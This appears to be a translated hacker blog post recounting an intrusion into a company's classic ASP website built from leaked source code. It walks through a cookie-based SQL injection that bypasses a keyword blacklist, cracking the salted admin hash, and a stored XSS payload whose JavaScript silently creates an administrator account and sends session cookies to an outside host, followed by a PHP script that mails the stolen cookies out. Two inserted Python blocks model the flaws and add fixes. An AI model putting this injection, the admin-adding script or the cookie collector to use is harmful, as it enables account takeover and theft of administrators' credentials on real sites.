First I took a rough look at the site's overall structure.


Found it wasn't one of those junk corporate sites you can take down in 5 minutes.

Looked at the neighbouring sites on the same server; all of them are built on the same program.


I couldn't be bothered with the C-class range, because in the kind of data centre that hosts a site like this, the odds of ARP-sniffing any data are worse than the Chinese football team making the World Cup.

That said, when I was doing foreign trade work last year, the company seemed to be using this very program. Back then I only glanced through it and didn't spot any serious vulnerabilities.

Things have been slow at work lately, so I got the source code of this program from a former colleague and had a look.

Found the following security problems:

In New.asp:

<!--#include file="top.asp"-->
<%
page=clng(request("page"))
Set rs=Server.CreateObject("ADODB.RecordSet")
sql="select * from member_news where type='"&request("type")&"' order by order0 desc"
rs.Open sql,conn,1,1
if rs.eof and rs.bof then
  response.Write("No news!")
else
%>

top.asp in turn includes inc/sql.asp, whose contents are:

<%
'generic SQL anti-injection
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'custom list of strings to filter, separated by "|"
Fy_In = "'|;|[| and | exec | insert | select | delete | update | count |*|%| chr | mid | master | truncate | char | declare "
'----------------------------------
Fy_Inf = split(Fy_In,"|")
'--------POST section------------------
If Request.Form<>"" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
                response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
'--------GET section-------------------
If Request.QueryString<>"" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh=0 To Ubound(Fy_Inf)
            If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
                response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
                response.end
            End If
        Next
    Next
End If
%>

Buddy, how come you don't give cookies a second thought?
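The scope gap that remark points at, as an added Python model (not code from the page or from the program): classic ASP's Request(name) searches QueryString, then Form, then Cookies, while inc/sql.asp scans only the first two, so the request("type") in New.asp can receive a value the blacklist never saw. The hardened function reads one named collection and binds the value; the table and rows are constructed.

```python
import sqlite3

# Same blacklist as inc/sql.asp (copied from the page), split on "|" like Fy_Inf
FY_IN = ("'|;|[| and | exec | insert | select | delete | update | count |*|%|"
         " chr | mid | master | truncate | char | declare ")
FY_INF = FY_IN.split("|")

class Request:
    """Classic ASP Request(name): falls through QueryString, Form, then Cookies."""
    def __init__(self, query=None, form=None, cookies=None):
        self.query_string = dict(query or {})
        self.form = dict(form or {})
        self.cookies = dict(cookies or {})

    def __call__(self, name):
        for coll in (self.query_string, self.form, self.cookies):
            if name in coll:
                return coll[name]
        return ""

def fy_filter_blocks(req):
    """Port of inc/sql.asp: only Form and QueryString values are scanned;
    a value that arrives in a cookie is never looked at."""
    for coll in (req.form, req.query_string):
        for value in coll.values():
            if any(token in value.lower() for token in FY_INF):
                return True  # the original does response.end here
    return False

def news_sql_vulnerable(req):
    """New.asp as written: run the filter, then concatenate request("type")."""
    if fy_filter_blocks(req):
        return None
    return ("select * from member_news where type='" + req("type")
            + "' order by order0 desc")

def make_db():
    conn = sqlite3.connect(":memory:")  # constructed stand-in for member_news
    conn.execute("create table member_news(id integer, type text, order0 integer)")
    conn.executemany("insert into member_news values (?, ?, ?)",
                     [(1, "press", 2), (2, "press", 1), (3, "internal", 5)])
    return conn

def news_ids_hardened(conn, req):
    """Fix: read the collection you mean and bind the value as a parameter;
    a quote in the input is then data, whatever the blacklist misses."""
    news_type = req.query_string.get("type", "")
    rows = conn.execute("select id from member_news where type=? order by order0 desc",
                        (news_type,)).fetchall()
    return [r[0] for r in rows]
```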

The key code of the backend login, admin/login.asp:

md5key="pjfmd5"
if request("action")="login" then
admin_name=trim(request("admin_name"))
admin_pass=md5(trim(request("admin_pass"))&md5key)

So take the hash obtained through the injection to cmd5 and crack it:

Xxooxxoo:pjfmd5

and you have the plaintext.

So one injection later, got it. To be safe I tested locally first; the result looked good.

But this loser had moved the admin backend; I tried the password against FTP, mailboxes and so on, with no result.

SO, keep digging.

Half an hour later, found inc/modify.asp

with the following code:

if request.Form("submit")<>"" then
    set rs=server.createobject("adodb.recordset")
    sql="select * from [user] where User_Name='"&session("user_name")&"'"
    rs.open sql,conn,1,3
    if rs.eof and rs.bof then
        response.write"<script>//alert('Sorry,this User_name not exist! Please check it');history.back(-1)</script>"
        response.end()
    else
        for i=2 to rs.fields.count-1
            if rs.fields(i).Name="Password2" then
            elseif rs.fields(i).Name="Country" then
                rs(rs.fields(i).Name)=split(countrystr,",")((request.Form(rs.fields(i).Name)))
            elseif rs.fields(i).Name="Password" and(request.Form(rs.fields(i).Name))<>rs("password") then
                response.Write "<script>//alert('You have Changed the password!');</script>"
                rs(rs.fields(i).Name)=md5((request.Form(rs.fields(i).Name))&md5key)
            elseif rs.fields(i).Name="sex" then
                rs(rs.fields(i).Name)=(""<>(request.Form(rs.fields(i).Name)))
            else
                rs(rs.fields(i).Name)=(request.Form(rs.fields(i).Name))
            end if 'save information
        next
        rs.update
        rs.close
    end if
    response.Write "<script>//alert('Modify success!');location='log.asp'</script>"
    response.End()
end if%>

The relevant fields go straight into the database without any processing. In other words, we can put our JS into the form.

OK, now let's look at the part of the backend that pulls the data out.

In /admin/member/6pjf.asp:

	elseif request("ac")="会员管理" then
	.............
	call rstotable(tcol_tname,where_order,"user",20,temptitle,"6pjfadd.asp","id","yes")

The rstotable function

pulls the data out without doing any filtering.
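How a value saved by inc/modify.asp ends up as live markup in the admin page, and the output-side fix, as an added Python model of rstotable (not the program's own code). The member rows and the "Company" field are constructed; the check at the end is what a reviewer would run over the rendered output.

```python
import html

# Constructed member rows, stored the way inc/modify.asp stores them: each
# submitted field is written verbatim, so a free-text field may hold markup.
# The "Company" field is an assumption, not a column named on the page.
MEMBERS = [
    {"id": 1, "User_Name": "alice", "Country": "Alabama", "Company": "Acme Ltd"},
    {"id": 2, "User_Name": "mallory", "Country": "Alabama",
     "Company": '<script src="http://example.invalid/x.js"></script>'},
]
COLS = ("id", "User_Name", "Country", "Company")

def rstotable_vulnerable(rows, cols):
    """Model of rstotable as described on the page: cell values go straight
    into the admin page, so stored markup is rendered as markup."""
    lines = ["<table>"]
    for row in rows:
        lines.append("<tr>" + "".join("<td>%s</td>" % row[c] for c in cols) + "</tr>")
    lines.append("</table>")
    return "\n".join(lines)

def rstotable_hardened(rows, cols):
    """Fix: HTML-encode every value at output time (Server.HTMLEncode in
    classic ASP), so the stored text is displayed and never executed."""
    lines = ["<table>"]
    for row in rows:
        cells = "".join("<td>%s</td>" % html.escape(str(row[c]), quote=True)
                        for c in cols)
        lines.append("<tr>" + cells + "</tr>")
    lines.append("</table>")
    return "\n".join(lines)

def data_cell_has_raw_tag(page_html):
    """Review check on rendered output: does any <td> body still contain a
    raw '<'? With encoding in place the answer must be False."""
    for cell in page_html.split("<td>")[1:]:
        body = cell.split("</td>", 1)[0]
        if "<" in body:
            return True
    return False
```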

Tested it.

Haha, hilarious.

Based on these conditions, I wrote a JS exploit.

Add an administrator.

Log the cookies and send them to my QQ. Sit back and wait for results.

The JS code is:

document.write('Alabama');
var xmlHttp;
if(window.ActiveXObject){
    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
else if(window.XMLHttpRequest){
    xmlHttp = new XMLHttpRequest();
}

function validateForm() {
    str = window.location.pathname;
    var strs = new Array();
    strs = str.split("/");
    x = strs[1];
    var url = "/"+ x +"/member/6pjfadd.asp?ac=%ba%f3%cc%a8%d5%ca%ba%c5%c9%e8%d6%c3";
    var params = "admin_name=yezi&admin_pass=fuckyou&admin_alow=%C0%CF%B0%E5&addtime=2012-5-31+4%3A55%3A59&submit=%CC%ED%BC%D3%BC%C7%C2%BC&refer="+ document.referrer;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", params.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.onreadystatechange = function() {
        if(xmlHttp.readyState == 4 && xmlHttp.status == 200) {
            //alert(xmlHttp.responseText);
        }
    }
    xmlHttp.send(params);
}
validateForm();
(function(){
    var a=document.createElement('script');
    a.setAttribute('type', 'text/javascript');
    a.setAttribute('src', 'http://yezi.us/xss.php?cookie='+document.cookie);
    document.getElementsByTagName('head').item(0).appendChild(a);
})()

The code of xss.php is:

<?php
date_default_timezone_set('Asia/Shanghai');
$a=@$_GET['cookie'];
$ref=$_SERVER['HTTP_REFERER'];
$data=$a."---cookie"."\r\n".$ref."---referer"."\r\n";
$to='5078****@qq.com';
$subject = 'You have something From : '.$ref;
$body="\n-------URL= ".$ref."\n-------Time = " .date("Y-m-d H:i:s")."\n-------Data = ".$data."\n----------------------------------------------";
$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Here Come Some Password";
if(!empty($a)){
    $sendmail = @mail($to, $subject, $body, $headers);
    if(!$sendmail){
        @$file = fopen('xsstest.txt' , 'a+');
        @$write = fwrite($file,$a.$ref.$data."\r\n");
        @fclose($file);
    }
}else{
    echo "Hey , man ,What r u doing ? ";
}
?>